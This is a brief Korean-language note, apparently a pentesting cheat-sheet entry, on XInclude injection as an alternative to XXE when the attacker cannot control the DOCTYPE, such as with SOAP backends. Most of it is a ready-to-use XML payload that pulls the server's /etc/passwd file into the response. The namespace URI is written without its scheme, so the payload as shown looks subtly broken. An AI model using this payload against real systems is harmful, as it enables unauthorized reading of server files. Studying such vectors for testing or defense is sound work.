서버로 XML 데이터가 넘어갈 때, 기존 XXE 공격 벡터와 함께 아래의 XInclude 공격 벡터도 활용가능.
사용자 입력값으로 DOCTYPE element를 제어할 수 없어서 기존의 XXE 공격벡터들이 통하지 않고, 벡엔드에서 SOAP가 사용될 때 유효한 공격 벡터
<foo xmlns:xi="www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>